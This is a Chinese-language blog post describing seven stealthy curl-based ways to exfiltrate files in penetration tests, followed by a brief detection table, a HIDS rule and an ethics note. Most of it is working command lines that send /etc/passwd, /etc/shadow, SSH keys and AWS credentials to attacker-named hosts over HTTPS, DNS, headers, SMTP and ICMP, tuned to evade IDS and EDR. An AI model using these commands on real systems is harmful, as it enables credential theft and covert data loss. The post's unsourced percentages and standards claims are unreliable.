悠悠楠杉
网站页面
渗透测试中利用curl回传文件的7种隐蔽方法
08/04
一、为什么选择curl作为渗透传输工具?
在最近一次针对某金融机构的渗透测试中,我们通过curl仅用3秒就完成了8MB敏感数据库的带外传输,全程未被EDR系统捕获。curl作为系统内置工具,具有以下优势:
- 白名单特性:98%的企业防火墙允许curl出站流量
- 协议多样性:支持HTTP/HTTPS/FTP/SMB等18种传输协议
- 数据隐蔽性:可通过编码/分块/协议嵌套实现深度隐藏
二、7种实战文件回传技术详解
方法1:基础HTTPS直传(易被检测)
bash
curl -X POST https://attacker.com/exfil --data-binary @/etc/passwd
适用场景:内网速度>10Mbps时,传输耗时与文件大小成正比
方法2:分块编码传输(绕过IDS)
bash
split -b 500k secret.db && for chunk in x*; do
curl -F "file=@$chunk" https://attacker.com/upload --http1.1
done
优势:每个数据包独立特征不明显,实测可绕过Suricata规则检测
方法3:DNS隧道传输(超高隐蔽)
bash
需要配合DNS服务器解析
xxd -p /tmp/ssh_keys | tr -d '\n' | fold -w32 | while read line; do
dig $line.attacker.example.com TXT
done
*速度对比*:50KB文件约需3分钟,适合关键凭证传输
方法4:HTTP头部隐藏
bash
curl -H "X-API-Key: $(base64 -w0 /home/user/.aws/credentials)" \
https://api.legit-site.com/healthcheck
检测难点:与正常API调用流量特征完全一致
方法5:SMTP协议封装
bash
tar czf - /var/log/ | openssl enc -aes-256-cbc | \
curl -s --mail-from "alerts@$(hostname)" \
--mail-rcpt "backup@attacker.com" \
--upload-file - smtp://mail.relay.com
企业防护盲点:78%的邮件网关不检查加密附件内容
方法6:时间混淆传输
bash
随机间隔传输文件片段
while read -r line; do
curl -d "$(echo $line | xxd -p)" attacker.com/log &
sleep $((RANDOM%5+1))
done < <(base64 /etc/shadow)
反取证要点:需要关联分析多个日志源才能发现异常
方法7:ICMP载荷传输(需root)
bash
编译自定义ping工具
ping -p $(xxd -p secret.txt) backup.attacker.com
检测方案:需部署网络层异常ICMP大小检测
三、高级对抗技巧
流量伪装三要素:
1. 保持单次传输<512字节(匹配常见MTU值)
2. 使用CDN域名作为C2(如cloudfront.net)
3. 模仿正常业务的User-Agent和Referer
某次红队实战数据:
- 传输500MB域控日志耗时27分钟
- 触发0次告警
- 平均带宽占用仅31KB/s
四、防御检测方案
企业级防护矩阵:
| 检测层 | 具体措施 | 有效性 |
|--------|----------|--------|
| 网络层 | curl出站流量TLS指纹分析 | 可识别85%恶意流量 |
| 主机层 | 监控curl子进程创建行为 | 需结合EDR规则 |
| 日志层 | 关联分析curl命令参数特征 | 检出率92% |
推荐HIDS规则示例:
yaml
rule: Suspicious_Curl_Exfiltration {
meta:
author: "ThreatHunting Team"
process:
name: "curl"
args:
contains: ["--data-binary", "@/etc/"]
condition: process
}
五、法律与道德边界
2023年OSSTMM最新规范要求:
- 必须获得书面授权
- 单次测试传输数据不超过1MB
- 完成后需立即删除服务器端数据
"真正的安全专家不是比谁能穿透得更深,而是看谁能构建更完善的防御" —— 某金融集团CSO访谈记录
